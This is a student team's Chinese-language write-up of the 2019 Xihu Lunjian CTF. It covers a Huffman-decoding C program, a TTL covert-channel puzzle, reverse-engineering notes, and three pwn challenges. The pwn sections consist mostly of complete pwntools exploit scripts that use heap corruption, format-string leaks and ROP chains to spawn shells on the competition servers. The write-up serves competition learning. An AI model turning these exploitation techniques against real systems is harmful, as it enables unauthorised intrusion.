2019西湖論劍網絡安全技能大賽（大學生組）部分WriteUp

 

這次比賽是我參加以來成績最好的一次，這離不開我們的小團隊中任何一個人的努力，熬了一整天才答完題，差點餓死在工作室（門衛大爺出去散步，把大門鎖了出不去，還好學弟提了幾個盒飯用網線從窗戶釣上來才吃到了午飯）。寫好WP回到宿舍的時候已經快十二點了，隨便吃了點面包倒頭就睡......

接下來大概寫寫我們的解題思路，由於做題的時候沒想到可以進名次，而且賽后比賽平台也關了，所以很多實現過程的截圖就沒法弄了，只下了除web以外的題目。

 

CRYPTO

 

第一題 HardGame

這道題我們並沒有做出來，可以看看大佬寫的-->https://mp.weixin.qq.com/s/rlSyABoulRKygPmwfcUuXA

第二題 哈夫曼之謎

下載下來的壓縮包里就兩個文件

在txt文檔內容如下：

 看到哈夫曼我記得當初好像是在數據結構里面學過，果斷找書，百度查資料，后來了解到，上面01的部分其實可以看做是加密的密文，下面相當於解密的秘鑰。

在下面的兩列中，第一列是哈夫曼樹的葉子節點，第二列是對應的權重值，之后就是長久的網上找代碼（沒辦法，代碼功底有點差，寫起來太費時間了，只能網上找找改改）

找到的代碼如下（在vs中運行的，之前的代碼在運行的時候因為數組設置的太小，之后會有溢出，所以我改了下數組大小）：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef int ELEMTYPE;

// 哈夫曼樹結點結構體
typedef struct HuffmanTree
{
    ELEMTYPE weight;
    ELEMTYPE id;        // id用來主要用以區分權值相同的結點，這里代表了下標
    struct HuffmanTree* lchild;
    struct HuffmanTree* rchild;
}HuffmanNode;

// 構建哈夫曼樹
HuffmanNode* createHuffmanTree(int* a, int n)
{
    int i, j;
    HuffmanNode **temp, *hufmTree;
    temp = malloc(n*sizeof(HuffmanNode));
    for (i = 0; i<n; ++i)     // 將數組a中的權值賦給結點中的weight
    {
        temp[i] = (HuffmanNode*)malloc(sizeof(HuffmanNode));
        temp[i]->weight = a[i];
        temp[i]->id = i;
        temp[i]->lchild = temp[i]->rchild = NULL;
    }

    for (i = 0; i<n - 1; ++i)       // 構建哈夫曼樹需要n-1合並
    {
        int small1 = -1, small2;      // small1、small2分別作為最小和次小權值的下標
        for (j = 0; j<n; ++j)         // 先將最小的兩個下標賦給small1、small2（注意：對應權值未必最小）
        {
            if (temp[j] != NULL && small1 == -1)
            {
                small1 = j;
                continue;
            }
            else if (temp[j] != NULL)
            {
                small2 = j;
                break;
            }
        }

        for (j = small2; j<n; ++j)    // 比較權值，挪動small1和small2使之分別成為最小和次小權值的下標
        {
            if (temp[j] != NULL)
            {
                if (temp[j]->weight < temp[small1]->weight)
                {
                    small2 = small1;
                    small1 = j;
                }
                else if (temp[j]->weight < temp[small2]->weight)
                {
                    small2 = j;
                }
            }
        }
        hufmTree = (HuffmanNode*)malloc(sizeof(HuffmanNode));
        hufmTree->weight = temp[small1]->weight + temp[small2]->weight;
        hufmTree->lchild = temp[small1];
        hufmTree->rchild = temp[small2];

        temp[small1] = hufmTree;
        temp[small2] = NULL;
    }
    free(temp);
    return hufmTree;
}

// 以廣義表的形式打印哈夫曼樹
void PrintHuffmanTree(HuffmanNode* hufmTree)
{
    if (hufmTree)
    {
        printf("%d", hufmTree->weight);
        if (hufmTree->lchild != NULL || hufmTree->rchild != NULL)
        {
            printf("(");
            PrintHuffmanTree(hufmTree->lchild);
            printf(",");
            PrintHuffmanTree(hufmTree->rchild);
            printf(")");
        }
    }
}

// 遞歸進行哈夫曼編碼
void HuffmanCode(HuffmanNode* hufmTree, int depth)      // depth是哈夫曼樹的深度
{
    static int code[100];
    if (hufmTree)
    {
        if (hufmTree->lchild == NULL && hufmTree->rchild == NULL)
        {
            printf("id為%d權值為%d的葉子結點的哈夫曼編碼為 ", hufmTree->id, hufmTree->weight);
            int i;
            for (i = 0; i<depth; ++i)
            {
                printf("%d", code[i]);
            }
            printf("\n");
        }
        else
        {
            code[depth] = 0;
            HuffmanCode(hufmTree->lchild, depth + 1);
            code[depth] = 1;
            HuffmanCode(hufmTree->rchild, depth + 1);
        }
    }
}

// 哈夫曼解碼
void HuffmanDecode(char ch[], HuffmanNode* hufmTree, char string[])     // ch是要解碼的01串，string是結點對應的字符
{
    int i;
    int num[500];
    HuffmanNode* tempTree = NULL;
    for (i = 0; i<strlen(ch); ++i)
    {
        if (ch[i] == '0')
            num[i] = 0;
        else
            num[i] = 1;
    }
    if (hufmTree)
    {
        i = 0;      // 計數已解碼01串的長度
        while (i<strlen(ch))
        {
            tempTree = hufmTree;
            while (tempTree->lchild != NULL && tempTree->rchild != NULL)
            {
                if (num[i] == 0)
                {
                    tempTree = tempTree->lchild;
                }
                else
                {
                    tempTree = tempTree->rchild;
                }
                ++i;
            }
            printf("%c", string[tempTree->id]);     // 輸出解碼后對應結點的字符
        }
    }
}

int main()
{
    int i, n;
    printf("請輸入葉子結點的個數：\n");
    while (1)
    {
        scanf("%d", &n);
        if (n>1)
            break;
        else
            printf("輸入錯誤，請重新輸入n值！");
    }

    int* arr;
    arr = (int*)malloc(n*sizeof(ELEMTYPE));
    printf("請輸入%d個葉子結點的權值：\n", n);
    for (i = 0; i<n; ++i)
    {
        scanf("%d", &arr[i]);
    }

    char ch[500], string[500];
    printf("請連續輸入這%d個葉子結點各自所代表的字符：\n", n);
    fflush(stdin);      // 強行清除緩存中的數據，也就是上面輸入權值結束時的回車符
    gets(string);

    HuffmanNode* hufmTree = NULL;
    hufmTree = createHuffmanTree(arr, n);

    printf("此哈夫曼樹的廣義表形式為：\n");
    PrintHuffmanTree(hufmTree);
    printf("\n各葉子結點的哈夫曼編碼為：\n");
    HuffmanCode(hufmTree, 0);

    printf("要解碼嗎？請輸入編碼:\n");
    gets(ch);
    printf("解碼結果為：\n");
    HuffmanDecode(ch, hufmTree, string);
    printf("\n");

    free(arr);
    free(hufmTree);

    return 0;
}

 

最后輸出結果：

最后出來的格式有點問題，要處理一下

 

 MISC

第一題 最短的路

題目如下：

這個題我后來看別人WP說是BSF算法，這個我也不太懂，以前沒碰到過，但是我們學弟直接手擼，就出來了，哈哈~

 

 我看也有人寫了腳本：

第二題 奇怪的TTL字段

題目描述如下：

我們截獲了一些IP數據報，發現報文頭中的TTL值特別可疑，懷疑是通信方嵌入了數據到TTL，我們將這些TTL值提取了出來，你能看出什么端倪嗎？

在txt文檔中全是這種數字，以前遇到過類似的題型，首先都是把里面的數字提取出來，再做處理

至於對數字該怎么處理，就查了好對資料，后來找到一篇文章提醒了我

最后處理方式如下：

63 127 191 255對應00 01 10 11

（如果是2種情況就猜0 1，4種情況就猜00 01 10 11，轉換為8位二進制，然后只取前兩位，因為觀察會發現后面幾位都是1）

之后就是對數據的進制轉換了，最終轉成十六進制

在最后轉換出的結果中，發現了六個jpg的文件頭（ffd8），說明這就是六張圖片，放在winhex生成圖片

再用PS合成了一張二維碼的圖片

掃描結果如下所示：

根據單詞AutomaticKey想到了是：自動密鑰密碼

解密網址：http://ctf.ssleye.com/autokey.html

這種加密只是針對字母，所以解密之后把對應的數字加上就可以了。

附py腳本如下（因為代碼有點多，所以就只上截圖了）

第三題 crackme

這道題我們沒有做出來，可以看大佬寫的wp--->https://mp.weixin.qq.com/s/rlSyABoulRKygPmwfcUuXA

PWN

第一題 Storm Note

 

直接上exp

from pwn import *
#p=process('./storm')
p=remote('ctf1.linkedbyx.com',10444)  //網址+端口
#port:10444
def add(size):
  p.recvuntil('Choice')
  p.sendline('1')
  p.recvuntil('?')
  p.sendline(str(size))
  
def edit(idx,mes):
  p.recvuntil('Choice')
  p.sendline('2')
  p.recvuntil('?')
  p.sendline(str(idx))
  p.recvuntil('Content')
  p.send(mes)

def dele(idx):
  p.recvuntil('Choice')
  p.sendline('3')
  p.recvuntil('?')
  p.sendline(str(idx))

add(0x18)     #0
add(0x508)    #1
add(0x18)     #2
edit(1, 'h'*0x4f0 + p64(0x500))   #set fake prev_size

add(0x18)     #3
add(0x508)    #4
add(0x18)     #5
edit(4, 'h'*0x4f0 + p64(0x500))   #set fake prev_size
add(0x18)     #6

dele(1)
edit(0, 'h'*(0x18))    #off-by-one
add(0x18)     #1
add(0x4d8)    #7
dele(1)
dele(2)         #backward consolidate
add(0x38)     #1
add(0x4e8)    #2

dele(4)
edit(3, 'h'*(0x18))    #off-by-one
add(0x18)     #4
add(0x4d8)    #8
dele(4)
dele(5)         #backward consolidate
add(0x48)     #4

dele(2)
add(0x4e8)    #2
dele(2)
storage = 0xabcd0100
fake_chunk = storage - 0x20

p1 = p64(0)*2 + p64(0) + p64(0x4f1) #size
p1 += p64(0) + p64(fake_chunk)      #bk
edit(7, p1)

p2 = p64(0)*4 + p64(0) + p64(0x4e1) #size
p2 += p64(0) + p64(fake_chunk+8)    #bk, for creating the "bk" of the faked chunk to avoid crashing when unlinking from unsorted bin
p2 += p64(0) + p64(fake_chunk-0x18-5)   #bk_nextsize, for creating the "size" of the faked chunk, using misalignment tricks
edit(8, p2)
add(0x48)
edit(2,p64(0)*8)

p.sendline('666')
p.send('\x00'*0x30)
'''
add(0x100-8)
add(0x200)
add(0x100)

edit(1,(p64(0x200)+p64(0x100))*32)
dele(1)
edit(0,'a'*(0x100-8))
add(0x100)
add(0x60)
dele(1)
dele(2)
add(0x100)
add(0x60)
'''
p.interactive()

 

 

第二題 story

 

這個題好像是libc泄露

上exp

#!/usr/bin/env python
# coding=utf-8
from pwn import *
io = remote('ctf1.linkedbyk.com', 10195)  //網址+端口號
#io = process('./story')
elf = ELF('./story')
#libc = elf.libc
libc = ELF('libc6_2.23-0ubuntu10_amd64.so')

io.recv()
__libc_start_main_got = elf.got['__libc_start_main']
payload = "%15$llx"+"AAAAAAAA"  + "%11$s" + "QQQQ" + p64(__libc_start_main_got)
print payload
io.sendline(payload)
io.recvuntil("Hello ")
cannary = int(io.recvuntil('AAAAAAAA', drop = True),16)
print hex(cannary)
temp = io.recv()[0:6]
__libc_start_main_addr = u64(temp+p8(0)*2)
libc_base = __libc_start_main_addr - libc.symbols['__libc_start_main']
print hex(__libc_start_main_addr)
#one_gadgets = libc_base + 0xf1147
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + libc.search('/bin/sh').next()
#get one_gadgetA
print "get_addr = " + hex(__libc_start_main_addr)
#print "one_gadgets = "+ hex(one_gadgets)
print "get_got = " + hex(__libc_start_main_got)
print "cannay= " + hex(cannary)
print "system_addr=" + hex(system_addr)
print "bin_sh=" + hex(bin_sh)
pop_rdi = 0x0000000000400bd3
#gdb.attach(io)
payload = 'A'*136 + p64(cannary) * 2 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
#payload = 'A'*136 + p64(cannary) * 2 + p64(one_gadgets)

print hex(cannary)
Size = len(payload)+1
print "size = " + str(Size)
io.sendline(str(len(payload)))
#gdb.attach(io)
print io.recv()
io.sendline(payload)
io.interactive()

 

第三題 noinfoleak

 

 exp

from pwn import *
#p=process('./noinfoleak')
libc = ELF('./libc-2.23.so')
p=remote('ctf1.linkedbyx.com',10426)  //網址+端口
def add(size,mes):
  p.recvuntil('>')
  p.sendline('1')
  p.recvuntil('>')
  p.sendline(str(size))
  p.recvuntil('>')
  p.send(mes)

def dele(idx):
  p.recvuntil('>')
  p.sendline('2')
  p.recvuntil('>')
  p.sendline(str(idx))
def edit(idx,mes):
  p.recvuntil('>')
  p.sendline('3')
  p.recvuntil('>')
  p.sendline(str(idx))
  p.recvuntil('>')
  p.send(mes)

add(0x60,p64(0x71)*4)
add(0x60,p64(0x71)*4)
add(0x60,p64(0x71)*4)
dele(0)
dele(1)
edit(1,'\x10')
add(0x60,p64(0x71)*4)
add(0x60,p64(0x71)*4)
add(0x50,'aaa')
add(0x50,'bbb')
edit(0,p64(0)+p64(0xd1))
dele(4)
a = 0x46# int(raw_input("a"),16)
edit(0,p64(0)+p64(0x71)+'\x5d'+chr(a))
dele(1)
dele(2)
edit(2,'\x10')
add(0x60,'a')
add(0x60,'\x00')
add(0x60,'\x00')
dele(5)
dele(6)
edit(6,p64(0x601120))
add(0x50,'/bin/sh\x00')
add(0x50,'\x20')
edit(9,p64(0xfbad3c80)+p64(0)*3+p8(0))
p.send('\n')
p.recv(24)
addr = u64(p.recv(6).ljust(8,'\x00'))
libc_base = addr - (0x7fb4e88cf6e0-0x7fb4e850c000)
info("libc:0x%x",libc_base)
system = libc_base+libc.symbols['system']
edit(11,p64(0x601018))
edit(9,p64(system))
dele(10)

p.interactive()

REVERSE

第一題 easyCpp

 

用IDA打開，分析函數代碼，發現好像是輸入過兩個變換

其他所有的數加上最后一個
- 順序整個反過來，最后一個不變
最后要變成一個斐波那契數列1 1 2 3 5 ... 987，可以得輸入

 

第二題 Junk_Instruction

 

這道題我們沒有做出來，可以看大佬寫的wp--->https://mp.weixin.qq.com/s/rlSyABoulRKygPmwfcUuXA

 

第三題 Testre

 

直接用IDA打開，F5查看函數，主要是對代碼的分析，涉及到了些算法

 

看下面的這點代碼，好像是輾轉相除法

 

 

之后查看字符串 主菜單View-Open subviews-strings，看到table

 

 

之后就是Base58解密了，網址：http://ctf.ssleye.com/base85.html

 （之后再學習后會再進一步詳細補充）

2019-04-08  11:35:05